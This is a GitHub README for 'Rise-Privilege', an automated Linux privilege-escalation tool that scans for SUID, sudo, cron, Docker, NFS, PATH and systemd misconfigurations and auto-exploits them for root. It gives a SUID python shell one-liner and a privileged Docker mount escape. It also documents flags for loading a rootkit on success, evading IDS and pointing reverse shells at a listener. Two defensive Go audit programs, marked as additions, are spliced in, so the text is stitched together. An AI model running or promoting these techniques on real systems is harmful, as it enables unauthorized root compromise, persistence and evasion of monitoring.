Ruby570bocadito/Rise-Privilege

⚠️ Ethical Warning

This tool is designed for authorized security testing, CTF competitions, and educational purposes only.

  • Only use on systems you own or have explicit written permission to test
  • Misuse may violate local and international laws
  • The author is not responsible for any damage caused by misuse

You have been warned.


🚀 Overview

Rise-Privilege is an automated Linux privilege escalation suite that scans a target system, identifies misconfigurations, and automatically exploits them to gain root access — all in a single, statically-linked Go binary with zero dependencies.

| Phase | Action | Description |
|---|---|---|
| 1. SCAN | Passive discovery | 10+ vulnerability scanners probe the system (read-only) |
| 2. ENUMERATE | Find → Exploit mapping | Matches findings against 60+ GTFOBins database |
| 3. EXPLOIT | Auto-root | Executes safest → most aggressive vector until root |

🔢 Features

10+ Vulnerability Scanners

| # | Scanner | Detection | Risk |
|---|---|---|---|
| 1 | SUID Binaries | Scans 10+ directories for SUID bit | Low |
| 2 | Sudo Misconfig | Parses sudo -l, finds NOPASSWD entries | Low |
| 3 | Writable Cron | Checks cron dirs & referenced scripts (world-writable) | Medium |
| 4 | Docker Breakout | Detects docker group membership, suggests escape | High |
| 5 | Capabilities | Reads /proc/self/status, finds cap_setuid/cap_sys_ptrace | Medium |
| 6 | NFS no_root_squash | Parses /etc/exports, finds exploitable exports | High |
| 7 | Writable PATH | Checks PATH directories for world-writable locations | Low |
| 8 | Systemd Services | Scans /etc/systemd/system for writable service files | Medium |
| 9 | /etc/passwd | Checks if world-writable, injects root user | Critical |
| 10 | /etc/shadow | Checks readability, cracks root hash | Critical |
| 11 | Kernel Info | Grabs kernel version, flags known CVEs (6 CVEs: PwnKit, Baron Samedit, PolaKit, StackRot, nf_tables UAF, packet socket UAF) | Medium |
| 12 | Writable Scripts | Detects world-writable shell scripts in cron/systemd | Medium |
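
The mode-bit checks behind scanners 1, 3, 7, 8 and 12 can be run by an administrator as a hardening audit of their own hosts. The Go program below is an added example, not code from Rise-Privilege; the `Finding` type, the `AuditTree` function and the default directory list are assumptions made for illustration.

```go
package main

import (
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
)

// Finding is one path whose mode bits match a check in the scanner table.
type Finding struct{ Path, Issue string }

// AuditTree walks root and reports regular files with the SUID bit set and
// any non-symlink entry that every user can write to. World-writable
// directories with the sticky bit (the /tmp pattern) are not reported.
func AuditTree(root string) []Finding {
	var out []Finding
	filepath.WalkDir(root, func(p string, d fs.DirEntry, err error) error {
		if err != nil {
			return nil // unreadable or missing entry: keep walking
		}
		info, err := d.Info()
		if err != nil || info.Mode()&fs.ModeSymlink != 0 {
			return nil
		}
		m := info.Mode()
		if m.IsRegular() && m&fs.ModeSetuid != 0 {
			out = append(out, Finding{p, "suid"})
		}
		if m.Perm()&0o002 != 0 && !(m.IsDir() && m&fs.ModeSticky != 0) {
			out = append(out, Finding{p, "world-writable"})
		}
		return nil
	})
	return out
}

func main() {
	// Assumed defaults: common cron and systemd locations; pass others as args.
	roots := []string{"/etc/cron.d", "/etc/cron.daily", "/etc/systemd/system"}
	if len(os.Args) > 1 {
		roots = os.Args[1:]
	}
	for _, r := range roots {
		for _, f := range AuditTree(r) {
			fmt.Printf("%-15s %s\n", f.Issue, f.Path)
		}
	}
}
```

Passing the directories from `$PATH` as arguments covers the Writable PATH check with the same function.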

Escalation Techniques

| Technique | How It Works | Auto-Exploit | Risk |
|---|---|---|---|
| SUID GTFOBins | Spawn privileged shell via SUID binary (e.g., python -c 'import os; os.execl("/bin/sh", "sh")') | | 🟢 SAFE |
| Sudo NOPASSWD | sudo via GTFOBins without password | | 🟢 SAFE |
| Cron Injection | Overwrite writable cron script with reverse shell | | 🟡 LOW |
| Docker Escape | docker run -v /:/mnt --privileged | | 🟡 MEDIUM |
| Capabilities | cap_setuid+ep binary → setuid(0) | | 🟡 MEDIUM |
| NFS no_root_squash | Mount export as root, write SUID binary | | 🟡 MEDIUM |
| passwd Injection | Append root user with known hash | | 🔴 HIGH |
| shadow Cracking | Read hash → shows the root hash for offline cracking | ⚠️ Detect + show | 🔴 HIGH |
| PATH Hijack | Place malicious binary in writable PATH dir | | 🟡 MEDIUM |
| Systemd Hijack | Replace writable service ExecStart with payload | | 🟡 MEDIUM |
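
Root squashing is the NFS default, so the NFS row above only applies where an export explicitly sets no_root_squash; auditing /etc/exports for that option is the corresponding hardening check. The Go program below is an added example, not code from Rise-Privilege: `RiskyExport` and `FindNoRootSquash` are hypothetical names, and `sampleExports` is constructed input.

```go
package main

import (
	"fmt"
	"strings"
)

// sampleExports is a constructed /etc/exports, not taken from any real host.
const sampleExports = `/srv/home   10.0.0.0/24(rw,sync,root_squash)
/srv/build  ci01(rw,no_root_squash) \
            *(ro)   # continuation line
/srv/backup -rw,no_root_squash backup01 audit01(ro,root_squash)
`

type RiskyExport struct{ Dir, Client, Opts string } // one client entry without root squashing

// FindNoRootSquash parses exports(5) text: comments, "\" continuations, "-opt" defaults.
func FindNoRootSquash(exports string) []RiskyExport {
	var out []RiskyExport
	text := strings.ReplaceAll(exports, "\\\n", " ")
	for _, line := range strings.Split(text, "\n") {
		line, _, _ = strings.Cut(line, "#")
		f := strings.Fields(line)
		defaults := ""
		for i := 1; i < len(f); i++ {
			if strings.HasPrefix(f[i], "-") {
				defaults = f[i][1:] // applies to the clients that follow
				continue
			}
			client, opts, _ := strings.Cut(strings.TrimSuffix(f[i], ")"), "(")
			opts = strings.Trim(defaults+","+opts, ",")
			squash := true // root_squash is the default
			for _, o := range strings.Split(opts, ",") {
				if o == "no_root_squash" || o == "root_squash" {
					squash = o == "root_squash" // the last squash option wins
				}
			}
			if !squash {
				out = append(out, RiskyExport{f[0], client, opts})
			}
		}
	}
	return out
}

func main() {
	for _, r := range FindNoRootSquash(sampleExports) {
		fmt.Printf("%s exported to %s with %s\n", r.Dir, r.Client, r.Opts)
	}
}
```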

📦 Quick Start

Installation

# Option A: Go install (requires Go 1.26+)
go install github.com/Ruby570bocadito/Rise-Privilege@latest

# Option B: Git clone & build
git clone https://github.com/Ruby570bocadito/Rise-Privilege.git
cd Rise-Privilege
go build -o Rise-Privilege .

# Option C: Download pre-built binary from Releases

Basic Usage

# Scan only (safe, read-only)
./Rise-Privilege

# Auto-exploit found vectors
./Rise-Privilege --exploit

# Auto-exploit with risk limit
./Rise-Privilege --exploit --risk=medium

# Specific vectors only
./Rise-Privilege --vector=suid,sudo,cron

# JSON output for automation
./Rise-Privilege --json

# Quiet mode (exit code: 0=root, 1=fail)
./Rise-Privilege --quiet

🧠 Architecture

flowchart LR
    A["🎯 Target System"] --> B["🔍 Scanner Engine"]
    B --> C["10+ Checks<br/>SUID · Sudo · Cron<br/>Docker · NFS · PATH"]
    C --> D{"Vulnerability<br/>Detected?"}
    D -->|"❌ No"| E["Report Findings"]
    D -->|"✅ Yes"| F["GTFOBins Matcher<br/>60+ Binaries"]
    F --> G["Risk Evaluator"]
    G --> H["🟢 SAFE"] --> K["Auto-Exploit"]
    G --> I["🟡 MEDIUM"] --> K
    G --> J["🔴 HIGH/DANGER"] --> K
    K --> L["💀 Root Shell<br/>or SUID Binary"]

File Structure

Rise-Privilege/
├── main.go                 CLI entry + orchestration
├── scanner.go              10+ vulnerability scanners
├── enumerate.go            Findings → exploit vector mapping
├── exploit.go              Exploitation engine (safe→danger)
├── gtfobins.go             Embedded GTFOBins database (~60 binaries)
├── gtfobins_update.go      GTFOBins updater from upstream
├── logger.go               Logging and output formatting
├── universe.go             Types, constants, formatting
├── peekaboo_test.go        Unit tests (9 tests)
├── docker/
│   ├── Dockerfile.vulnerable    Target with 10 deliberate flaws
│   ├── Dockerfile.clean         Secure baseline system
│   ├── Dockerfile.edgecases     Edge case scenarios
│   ├── docker-compose.yml       Test network
│   └── test_runner.sh           Automated test runner
└── README.md

🐳 Docker Testing

# Build all images
cd docker
docker compose build

# Start test network (vulnerable + clean + edgecases)
docker compose up -d

# Run Rise-Privilege on vulnerable target
docker exec peekaboo-vulnerable ./Rise-Privilege --exploit

# Run on clean system (should find minimal vectors)
docker exec peekaboo-clean ./Rise-Privilege

# Run edge case scenarios
docker exec peekaboo-edgecases ./Rise-Privilege --vector=sudo

# Full test suite
./docker/test_runner.sh

🎯 GTFOBins Database

60+ binaries with exploitation commands, embedded in the binary. Zero network calls at runtime. Works air-gapped.

All supported binaries:

Shell interpreters (SUID): python, python2, python3, python3.8-3.13, perl, perl5, php, php5-8.2, ruby, ruby2-3, lua, lua5.3-5.4, node, nodejs, bash, dash, zsh, ksh, fish, sh

Sudo-capable binaries: find, vim, vi, less, more, man, awk, gawk, nawk, sed, gdb, nmap, tcpdump, tar, zip, unzip, rsync, scp, socat, env, nice, timeout, stdbuf, watch, make, pip, pip3, npm, gem, git, ssh, docker, lxc, apache2, cpan, ed, ex, ftp, wall, systemctl, journalctl, mysql, psql, sqlite3


⚡ All Commands

| Command | Description |
|---|---|
| ./Rise-Privilege | Scan only (no exploit) |
| ./Rise-Privilege --exploit | Auto-exploit safest vector first |
| ./Rise-Privilege --exploit --risk=safe | Only SAFE risk vectors |
| ./Rise-Privilege --exploit --risk=danger | Everything (including dangerous) |
| ./Rise-Privilege --vector=suid,sudo,cron | Specific vectors only |
| ./Rise-Privilege --exploit --one-shot | Stop after first success |
| ./Rise-Privilege --json | Machine-readable JSON output |
| ./Rise-Privilege --quiet | Exit code only (0=root, 1=fail) |
| ./Rise-Privilege --rooteame ./rootkit.ko | Load rootkit on success |
| ./Rise-Privilege --stealth | Slow scan (evades IDS) |
| ./Rise-Privilege --dry-run | Scan & enumerate only, no exploitation |
| ./Rise-Privilege --update-gtfobins | Update embedded GTFOBins database |
| ./Rise-Privilege --lhost 10.0.0.1 | Set listener IP for reverse shells |
| ./Rise-Privilege --lport 4444 | Set listener port for reverse shells |
| ./Rise-Privilege --log json | JSON log format (default: text) |

📊 Risk Levels

| Level | Examples | Auto-Exploit? | FS Changes? |
|---|---|---|---|
| 🟢 SAFE | python SUID → shell | ✅ Yes | No |
| 🟡 LOW | find SUID, awk sudo | ✅ Yes | Minor |
| 🟠 MEDIUM | cap_sys_ptrace, cron inject | ⚠️ Optional | May trigger alerts |
| 🔴 HIGH | passwd injection, cron, docker | ⚠️ Optional | Yes |
| 💀 DANGER | shadow overwrite, kernel exploits | ✋ Manual only | Yes, may crash |



Built with ❤️ by Ruby570bocadito
Formerly known as Peekaboo — Now Rise-Privilege


© 2026 Ruby570bocadito. MIT License.
